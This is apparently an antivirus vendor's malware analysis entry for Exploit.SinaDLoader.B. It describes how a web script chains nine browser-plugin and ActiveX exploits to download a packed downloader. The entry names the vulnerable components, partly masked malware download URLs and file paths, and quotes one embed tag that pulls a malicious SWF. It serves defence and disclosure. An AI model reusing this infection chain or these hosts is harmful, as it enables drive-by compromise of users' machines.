Exploit.SinaDLoader.B

( Exploit:JS/Axdow.A, JS.ActiveXploit.Gen,Trojan-Downloader.JS.Agent.di )

SYMPTOMS:

This is an exploit (or more) with few noticeable symptoms of infection. It has been hosted on different malware websites.

TECHNICAL DESCRIPTION:

The exploit keeps the new trend found in recent sites that host malware in order to infect computers. It tries a number of exploits in order to infect the user. If one of them doesn't succeed, then try and try again.

Here is an enumeration of the exploits used :

1. Snapshot Viewer Control.1 . The mechanism is described here ( used by another script that exploits a vulnerability in the ActiveX control for the Snapshot Viewer ) . With this exploit it tries to download a file onto the affected computer to  the following path ([c or d or e drive] :\Program Files/Outlook Express/wab.exe ) from the following address : xxx.xiazail?.com/mas1.css. Although it has the extension "css" (Cascading Style Sheets used for formating html ), it is an executable file.
2. DownloadAndInstall exploit used to download http://zxc.11se??.com/mas1.exe which is the same file mentioned earlier, only that this time it has the extension "exe".
3. Adodb.Stream exploit which creates an invisible iframe to http://222.213asd??.com/ms06014.js which in turn downloads and executes the same file that I talked about from the same address discused over the first point. The file is saved on the computer in "..\\ntuser.com" (parent folder of your browsers).
4. ShockwaveFlash.ShockwaveFlash.9 exploit that serves a certain SWF file acording to the version installed on the user's machine, in form of an embeded object. The code looks like this : "<embed src="http://222.213asd??.com/'+[variable_that_stores_part_of_version]+'.swf"></embed>" .
5. UUUpgrade ActiveX Control module--update exploit (UUUPGRADE.UUUpgradeCtrl.1 component) which downloads http://222.213asd??.com/UU.ini
6. Lianzhong chat room (GLIEDown.IEDown.1) exploit which downloads "http://222.213asdas.com/GLWORLD.html"  that again downloads trough another exploit (buffer overflow) this file http://xxx.xiazail??.com/mas1.css (the same "old" malware file ).
   
7. A RealPlayer exploit ( IERPCtl.IERPCtl.1 component ) which, for versions lower than 6.0.14.552, pushes this script 222.213asd??.com/real.js that takes a different approach for distinct versions. If the user has a newer version it creates an invisible iframe with "http://222.213asd??.com/Real11.html" which downloads http://xxx.xiazail??.com/mas1.css.
8. Baidu Search Bar (BaiduBar.Tool) exploit using vulnerable "DloadDS" function that refers to a "http://222.213asd??.com/Baidu.cab" and "Baidu.exe" inside the "CAB" archive. 
9. Xunlei Thunder exploit (ActiveXObject DPClient.Vod)  with another invisible iframe that leads to 222.213asd??.com/Thunder.html, unavailable at the time of analysis.

The files I mentioned numerous times mas1.css or mas1.exe, are actually the same file. It is a small downloader (1900 bytes) packed with FSG, which downloads 5640ghi?.com/max1.exe (unfortunately unavailable at the time of analysis) and is detected as Generic.Malware.dld!!.8EC79AB8.

As you see, there is a long line of scripts/executable that tries to download the "final" malware. It is a hierarchy of exploits that take advantage of different flaws of applications. Thus you should always keep the applications you use updated and the antivirus product up to date.

Removal instructions:

Please let BitDefender disinfect your files.

ANALYZED BY:

Daniel Chipiristeanu, virus researcher